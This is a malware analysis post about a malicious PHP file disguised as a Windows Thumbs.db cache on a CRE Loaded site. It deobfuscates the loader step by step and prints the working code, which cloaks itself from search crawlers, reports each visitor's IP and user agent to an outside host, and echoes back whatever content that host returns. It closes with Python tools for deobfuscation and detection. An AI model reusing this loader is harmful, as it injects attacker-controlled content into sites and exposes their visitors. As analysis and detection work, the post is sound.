Summary

Thumbs.db can contain malicious code meant to fetch content from a remote server and pass it on to your site’s visitors. A file named “Thumbs.db” may be nothing more than the image thumbnail cache that Windows generates. But if your site has any files named “Thumbs.db” matching the description below, then it has almost certainly been compromised.

Background

We found a cleverly hidden malicious PHP file named “Thumbs.db” left in a site running CRE Loaded v6.2 Pro[12].  There are reports of other malicious files named “Thumbs.db.php”, but this one leaves off the PHP extension and relies on a line injected into the .htaccess file to get handled by the PHP interpreter.  This makes it blend in better as an innocuous file, as Windows automatically generates “Thumbs.db” files to store little preview icons for images, and these often get uploaded to websites along with the images.

If Thumbs.db is included or executed, it grabs content from a remote host and serves it back to the user.

Analysis

Here is the original code. The @ operator suppresses any error messages the call would otherwise produce.

@eval(base64_decode("..."));

After base64-decoding, you can see “eval” and “base64_decode” written backwards in the result, as well as a function evalJHIOkgzInSMJH() which simply reverses the string it receives as input. I’m going to rename it “reverse()” and sort out line breaks and such.

if ($evalZjhGYTfoFIetGo != 34517) {
   function reverse($s) {
       for ($a = 0; $a < strlen($s); $a++) {
           $e .= $s{strlen($s)-$a-1};
       }
       return($e);
   }
   eval(reverse(';))"=sTKwgyZulGdy9GclJ3Xy9mcyVGQ"(edoced_46esab(lave'));
   eval(reverse(';))"=ASf7kCaYlEe4NGZjF0ayFFbhZXZkgSZk92YlR2X0YTZzFmYg4mc1RXZytHIpgGWJhHejR2YBtmcRxWY2VGJoYEWJFGVZdWeQtEbhZXZg42bpR3YuVnZ"(edoced_46esab(lave'));
   eval(reverse(';))"==wOpISPNJTWigiRYlUYUl1Z5B1SsFmdlBSPgYVQ59kZmZUWtdHUixWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"7kiI90ESkhmUzMmIoYEWJFGVZdWeQtEbhZXZ9s2QR1UcqFFUhllYHxWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"7kiI90TQjBjUIFmIoYEWJFGVZdWeQtEbhZXZ9MkZk5UbBFFVmZFVmZ3Q6xWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"=sTKi0DNXFmIoYEWJFGVZdWeQtEbhZXZ98EenNVbOp1US9GSLJlbwxWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"==wOpISP9EVS2R2VJJCKGhVShRVWnlHULxWY2VWP6d0Yk1UZz1WaDllQi1GarxWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"==wOdliIVVTVShkRwg1UWBTVWljRVVlUGNlIoYEWJFGVZdWeQtEbhZXZbJVRWJVRT9FJ9U1Trt0arJWazFmcIxWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"=sTKpISP9c2YshXbZRnRtVlIoYEWJFGVZdWeQtEbhZXZgwSKiQjVHpVdGd1VigiRYlUYUl1Z5B1SsFmdlBCLpISPJhlWyw2RhpmSYllZGdVYigiRYlUYUl1Z5B1SsFmdlBCLpICM50WUP5kVUJCKGhVShRVWnlHULxWY2VGIskiI9EkbjFDeyUlIoYEWJFGVZdWeQtEbhZXZgwSKiwGeyold5IjUigiRYlUYUl1Z5B1SsFmdlhSehJnchBSPg0Ua0ZWTKREephHcq52SSxWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"==wOWFUePZmZGlVb3BlYsFmdlRSPuAnaCpUV5RGWsNGbhZXZkASKgsyKpRCI7gDI9wDIpRCI7ADI9ASakgCIy9mZ"(edoced_46esab(lave'));
   eval(reverse(';))"=sTKpISP9ElZ3sWejt2Z5NGM1clWwUjMipWOGRGbkJDWsh3Vh1mQFlUdKhFZwYVbjdjQTtkeSN0SNlzaadnSsVGNoV0VCZFbkdnVHJGaahlWnRjMiBnUzkVdW5mWigiRYlUYUl1Z5B1SsFmdlhCbhZXZ"(edoced_46esab(lave'));
   eval(reverse(';))"==wOWFUePZmZGlVb3BlYsFmdlRiLi4iI94CIwpmQKVVekhFbjxWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"=..."(edoced_46esab(lave'));
   $evalZjhGYTfoFIetGo = 34517;
}

With all the strings reversed, here’s what we get:

if ($evalZjhGYTfoFIetGo != 34517) {
   eval(base64_decode("QGVycm9yX3JlcG9ydGluZygwKTs="));
   eval(base64_decode("ZnVuY3Rpb24gZXZhbEtQeWdZVGFJWEYoJGV2YWxRcmtBY2RjeHhJWGgpIHtyZXR1cm4gYmFzZTY0X2RlY29kZSgkZXZhbFFya0FjZGN4eElYaCk7fSA="));
   eval(base64_decode("JGV2YWxiUHdtWUZmZk95QVYgPSBldmFsS1B5Z1lUYUlYRigiWTJNPSIpOw=="));
   eval(base64_decode("JGV2YWxHYllhUFFqcU1RQ2s9ZXZhbEtQeWdZVGFJWEYoImMzUmhkSE09Iik7"));
   eval(base64_decode("JGV2YWx6Q3ZmVFZmVFFBbU5kZkM9ZXZhbEtQeWdZVGFJWEYoImFIUjBjQT09Iik7"));
   eval(base64_decode("JGV2YWxwblJLSG9SU1pObVNneE89ZXZhbEtQeWdZVGFJWEYoImFXND0iKTs="));
   eval(base64_decode("JGV2YWxraG1iQllDaW1zZU1kY0d6PWV2YWxLUHlnWVRhSVhGKCJJV2R2SVE9PSIpOw=="));
   eval(base64_decode("JGV2YWxSS25qcHhpeERKTWZ0aU0gPSBhcnJheShldmFsS1B5Z1lUYUlYRigiUjI5dloyeGwiKSwgZXZhbEtQeWdZVGFJWEYoIlUyeDFjbkE9IiksIGV2YWxLUHlnWVRhSVhGKCJUVk5PUW05MCIpLCBldmFsS1B5Z1lUYUlYRigiYVdGZllYSmphR2wyWlhJPSIpLCBldmFsS1B5Z1lUYUlYRigiV1dGdVpHVjQiKSwgZXZhbEtQeWdZVGFJWEYoIlVtRnRZbXhsY2c9PSIpKTs="));
   eval(base64_decode("JGV2YWxIcmFzaWJra0trT1U9JF9TRVJWRVJbZXZhbEtQeWdZVGFJWEYoIlNGUlVVRjlWVTBWU1gwRkhSVTVVIildOw=="));
   eval(base64_decode("Zm9yICgkaSA9IDA7ICRpIDw9IDg7ICRpKysgKSAkZXZhbGNsWGR5VUpCanAuPSRldmFsYlB3bVlGZmZPeUFWOw=="));
   eval(base64_decode("ZXZhbChldmFsS1B5Z1lUYUlYRigiWm5WdVkzUnBiMjRnWlhaaGJHVndkbFZCV0VoNGVsSndaazlNS0NSektTQjdjbVYwZFhKdUlFQm1hV3hsWDJkbGRGOWpiMjUwWlc1MGN5Z2tjeWs3ZlE9PSIpKTs="));
   eval(base64_decode("JGV2YWxjbFhkeVVKQmpwIC49Ii4iLiRldmFsYlB3bVlGZmZPeUFWOw=="));
   eval(base64_decode("..."));
   $evalZjhGYTfoFIetGo = 34517;
}

After base64 decoding all those strings and removing the eval() on each one:

if ($evalZjhGYTfoFIetGo != 34517) {
   @error_reporting(0);
   function evalKPygYTaIXF($evalQrkAcdcxxIXh) {return base64_decode($evalQrkAcdcxxIXh);}
   $evalbPwmYFffOyAV = evalKPygYTaIXF("Y2M=");
   $evalGbYaPQjqMQCk=evalKPygYTaIXF("c3RhdHM=");
   $evalzCvfTVfTQAmNdfC=evalKPygYTaIXF("aHR0cA==");
   $evalpnRKHoRSZNmSgxO=evalKPygYTaIXF("aW4=");
   $evalkhmbBYCimseMdcGz=evalKPygYTaIXF("IWdvIQ==");
   $evalRKnjpxixDJMftiM = array(evalKPygYTaIXF("R29vZ2xl"), evalKPygYTaIXF("U2x1cnA="), evalKPygYTaIXF("TVNOQm90"), evalKPygYTaIXF("aWFfYXJjaGl2ZXI="), evalKPygYTaIXF("WWFuZGV4"), evalKPygYTaIXF("UmFtYmxlcg=="));
   $evalHrasibkkKkOU=$_SERVER[evalKPygYTaIXF("SFRUUF9VU0VSX0FHRU5U")];
   for ($i = 0; $i <= 8; $i++ ) $evalclXdyUJBjp.=$evalbPwmYFffOyAV;
   eval(evalKPygYTaIXF("ZnVuY3Rpb24gZXZhbGVwdlVBWEh4elJwZk9MKCRzKSB7cmV0dXJuIEBmaWxlX2dldF9jb250ZW50cygkcyk7fQ=="));
   $evalclXdyUJBjp .=".".$evalbPwmYFffOyAV;
   if((preg_match("/" . implode("|", $evalRKnjpxixDJMftiM) . "/i", $evalHrasibkkKkOU)) or (isset($_COOKIE[$evalGbYaPQjqMQCk]))) {} else { @setcookie($evalGbYaPQjqMQCk,md5(evalKPygYTaIXF("c3RhdHM=")),time()+10800); $evalINZdcejWnjEXc = evalepvUAXHxzRpfOL($evalzCvfTVfTQAmNdfC.evalKPygYTaIXF("Og==").evalKPygYTaIXF("Ly8=").$evalclXdyUJBjp.evalKPygYTaIXF("Lw==").$evalpnRKHoRSZNmSgxO.evalKPygYTaIXF("LnBo").evalKPygYTaIXF("cD8=").evalKPygYTaIXF("aT0=").$_SERVER[evalKPygYTaIXF("UkVNT1RFX0FERFI=")].evalKPygYTaIXF("JmI9").urlencode($evalHrasibkkKkOU).evalKPygYTaIXF("Jmg9").urlencode($_SERVER[evalKPygYTaIXF("SFRUUF9IT1NU")]));if (strstr($evalINZdcejWnjEXc,$evalkhmbBYCimseMdcGz)){$evalINZdcejWnjEXc = explode($evalkhmbBYCimseMdcGz,$evalINZdcejWnjEXc); $evalINZdcejWnjEXc = $evalINZdcejWnjEXc[1];echo $evalINZdcejWnjEXc;}}
   $evalZjhGYTfoFIetGo = 34517;
}

Another layer of obfuscation. evalKPygYTaIXF() is a wrapper around base64_decode. After formatting it, removing the base64_decode wrapper, and doing all the base64 decodes:

if ($evalZjhGYTfoFIetGo != 34517) {
   @error_reporting(0);
   $evalbPwmYFffOyAV = "cc";
   $evalGbYaPQjqMQCk = "stats";
   $evalzCvfTVfTQAmNdfC = "http";
   $evalpnRKHoRSZNmSgxO = "in";
   $evalkhmbBYCimseMdcGz = "!go!";
   $evalRKnjpxixDJMftiM = array( "Google",
                                 "Slurp",
                                 "MSNBot",
                                 "ia_archiver",
                                 "Yandex",
                                 "Rambler");
   $evalHrasibkkKkOU = $_SERVER["HTTP_USER_AGENT"];
   for ($i = 0; $i <= 8; $i++)
       $evalclXdyUJBjp .= $evalbPwmYFffOyAV;
   function evalepvUAXHxzRpfOL($s) {
       return @file_get_contents($s);
   }
   $evalclXdyUJBjp .= "." . $evalbPwmYFffOyAV;
   if((preg_match("/" . implode("|", $evalRKnjpxixDJMftiM) . "/i", $evalHrasibkkKkOU)) or (isset($_COOKIE[$evalGbYaPQjqMQCk]))) {
   }
   else {
       @setcookie($evalGbYaPQjqMQCk, md5("stats"), time() + 10800);
       $evalINZdcejWnjEXc = evalepvUAXHxzRpfOL($evalzCvfTVfTQAmNdfC . ":" .
                                               "//" .
                                               $evalclXdyUJBjp .
                                               "/" .
                                               $evalpnRKHoRSZNmSgxO . ".ph" .
                                               "p?" .
                                               "i=" .
                                               $_SERVER["REMOTE_ADDR"] .
                                               "&b=" .
                                               urlencode($evalHrasibkkKkOU) .
                                               "&h=" .
                                               urlencode($_SERVER["HTTP_HOST"]));
       if (strstr($evalINZdcejWnjEXc, $evalkhmbBYCimseMdcGz)) {
           $evalINZdcejWnjEXc = explode($evalkhmbBYCimseMdcGz, $evalINZdcejWnjEXc);
           $evalINZdcejWnjEXc = $evalINZdcejWnjEXc[1];
           echo $evalINZdcejWnjEXc;
       }
   }
   $evalZjhGYTfoFIetGo = 34517;
}
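The three peeling steps walked through above (reversing the eval(reverse('…')) strings, base64-decoding the eval(base64_decode("…")) strings, and inlining the base64_decode wrapper function) can be done as plain text rewriting without ever executing the PHP. This Python script is an added example, not part of the original analysis; its regexes match only the wrapper shapes seen in this sample, and the embedded SAMPLE is constructed from three of the lines shown above.

```python
import base64
import re

# Wrapper shapes seen in this Thumbs.db sample (reverse() is the renamed
# string-reversing helper from the write-up):
#   eval(reverse('...'));  and  eval(base64_decode("..."));
REV_EVAL = re.compile(r"eval\(reverse\('([^']*)'\)\);")
B64_EVAL = re.compile(r'eval\(base64_decode\("([A-Za-z0-9+/=]*)"\)\);')
# The inner layer: a one-line function that merely wraps base64_decode().
WRAPPER_DEF = re.compile(r'function (\w+)\(\$(\w+)\) \{return base64_decode\(\$\2\);\}')

def b64(s: str) -> str:
    # Added helper: decode as latin-1 so arbitrary bytes never raise.
    return base64.b64decode(s).decode("latin-1")

def peel_reverse(code: str) -> str:
    """eval(reverse('X'))  ->  X written backwards, i.e. the real PHP."""
    return REV_EVAL.sub(lambda m: m.group(1)[::-1], code)

def peel_base64(code: str) -> str:
    """eval(base64_decode("X"))  ->  the decoded PHP source."""
    return B64_EVAL.sub(lambda m: b64(m.group(1)), code)

def inline_wrapper(code: str) -> str:
    """Find the base64_decode wrapper function and resolve every call to it
    into a plain string literal, as the write-up does by hand."""
    m = WRAPPER_DEF.search(code)
    if not m:
        return code
    call = re.compile(re.escape(m.group(1)) + r'\("([A-Za-z0-9+/=]*)"\)')
    return call.sub(lambda c: '"' + b64(c.group(1)) + '"', code)

def deobfuscate(code: str, max_layers: int = 10) -> str:
    """Peel reverse and base64 layers until nothing changes, then inline
    the wrapper. Nothing is executed; this is pure text rewriting."""
    for _ in range(max_layers):
        new = peel_base64(peel_reverse(code))
        if new == code:
            break
        code = new
    return inline_wrapper(code)

# Constructed sample: three wrapped lines from the write-up, as found.
SAMPLE = """if ($evalZjhGYTfoFIetGo != 34517) {
   eval(reverse(';))"=sTKwgyZulGdy9GclJ3Xy9mcyVGQ"(edoced_46esab(lave'));
   eval(base64_decode("ZnVuY3Rpb24gZXZhbEtQeWdZVGFJWEYoJGV2YWxRcmtBY2RjeHhJWGgpIHtyZXR1cm4gYmFzZTY0X2RlY29kZSgkZXZhbFFya0FjZGN4eElYaCk7fSA="));
   eval(base64_decode("JGV2YWxiUHdtWUZmZk95QVYgPSBldmFsS1B5Z1lUYUlYRigiWTJNPSIpOw=="));
   $evalZjhGYTfoFIetGo = 34517;
}"""
```

deobfuscate(SAMPLE) yields the @error_reporting(0) line, the wrapper definition, and $evalbPwmYFffOyAV = "cc"; with every eval() gone.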

Continuing to format the code, I renamed the variables and inlined the ones that never change. I also removed the wrapper around file_get_contents():

if ($flag != 34517) {
   @error_reporting(0);
   $bot_useragents = array( "Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");

   if((preg_match("/" . implode("|", $bot_useragents) . "/i", $_SERVER["HTTP_USER_AGENT"])) or (isset($_COOKIE["stats"]))) {
   }
   else {
       @setcookie("stats", md5("stats"), time() + 10800);
       $result = @file_get_contents("http://cccccccccccccccccc.cc/in.php?i=" . $_SERVER["REMOTE_ADDR"] .
                                               "&b=" . urlencode($_SERVER["HTTP_USER_AGENT"]) .
                                               "&h=" . urlencode($_SERVER["HTTP_HOST"]));
       if (strstr($result, "!go!")) {
           $result = explode("!go!", $result);
           $result = $result[1];
           echo $result;
       }
   }
   $flag = 34517;
}

And adding my comments to the final product:

// Not sure what's going on with this, other than it prevents the code from executing more than once.
if ($flag != 34517) {
   // Try to silence PHP's error messages.
   @error_reporting(0);
   // Create an array of substrings found in the User-Agent strings of some of the more common web-crawling bots.
   $bot_useragents = array( "Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
   // Assemble a regular expression to check whether any of those substrings are in the client's User-Agent.
   // Also check for the presence of a cookie.
   if((preg_match("/" . implode("|", $bot_useragents) . "/i", $_SERVER["HTTP_USER_AGENT"])) or (isset($_COOKIE["stats"]))) {
       // If either check is positive, do nothing.  Otherwise...
   }
   else {
       // Set the "stats" cookie.  10800 seconds means it expires in three hours.
       @setcookie("stats", md5("stats"), time() + 10800);
       // Go get the contents of the following URL, which includes the client's IP address, their User-Agent, and the
       // server's own address or domain name.
       $result = @file_get_contents("http://cccccccccccccccccc.cc/in.php?i=" . $_SERVER["REMOTE_ADDR"] .
                                               "&b=" . urlencode($_SERVER["HTTP_USER_AGENT"]) .
                                               "&h=" . urlencode($_SERVER["HTTP_HOST"]));
       // If the result contains the substring "!go!"...
       if (strstr($result, "!go!")) {
           // Separate "!go!" from the rest of the result.
           $result = explode("!go!", $result);
           // Grab the part that, presumably, comes after "!go!"
           $result = $result[1];
           // Print the result to the browser.
           echo $result;
       }
   }
   // Set the flag.
   $flag = 34517;
}

That’s one of my favorite malware domains ever. According to the WHOIS information on robtex, it was created on 11 April 2011, then suspended on 3 May 2011. Since it doesn’t resolve to anything now, this particular version of Thumbs.db is rendered harmless, but future versions may point elsewhere.
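To check a site for the pattern described in this write-up, here is an added Python scanner (not part of the original post). It treats a Thumbs.db that starts with the OLE2 compound-document signature as a genuine Windows thumbnail cache, flags one that carries PHP markers, and reports .htaccess lines that tie .db files to a handler; since the post does not quote the injected .htaccess line, that last check is a heuristic of mine.

```python
import os
import re

# A genuine Windows Thumbs.db is an OLE2 compound document and starts with
# this 8-byte signature (a property of the file format, not of this malware).
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# Tokens that have no business in a thumbnail cache but appear in the sample.
PHP_TOKENS = (b"<?php", b"eval(", b"base64_decode(", b"edoced_46esab")
# Heuristic (an assumption, as the write-up does not quote the injected line):
# an .htaccess line naming Thumbs.db or .db together with a handler/type
# directive deserves a look.
HANDLER_WORDS = re.compile(r"\b(AddType|AddHandler|SetHandler|ForceType|php)\b", re.I)
DB_WORDS = re.compile(r"thumbs\.db|\.db\b", re.I)

def classify_thumbs(data: bytes) -> str:
    """'benign' for a real thumbnail cache, 'malicious' if PHP markers are
    present, otherwise 'unknown' (e.g. an empty or unrecognised file)."""
    if data.startswith(OLE2_MAGIC):
        return "benign"
    head = data[:4096]   # the sample is a one-liner, so this is plenty
    if any(tok in head for tok in PHP_TOKENS):
        return "malicious"
    return "unknown"

def suspicious_htaccess_lines(text: str) -> list:
    """Return (line_no, line) pairs that map .db / Thumbs.db to a handler."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        if DB_WORDS.search(line) and HANDLER_WORDS.search(line):
            hits.append((no, line.strip()))
    return hits

def scan(webroot: str) -> list:
    """Walk webroot and report every finding as a (path, detail) pair."""
    findings = []
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() == "thumbs.db":
                with open(path, "rb") as fh:
                    verdict = classify_thumbs(fh.read())
                if verdict != "benign":
                    findings.append((path, verdict))
            elif name == ".htaccess":
                with open(path, "r", errors="replace") as fh:
                    for no, line in suspicious_htaccess_lines(fh.read()):
                        findings.append((path, "line %d: %s" % (no, line)))
    return findings
```

Run scan("/path/to/webroot") and review anything it returns; an "unknown" Thumbs.db is not proof of compromise, only a file that is not the OLE2 cache Windows would have written.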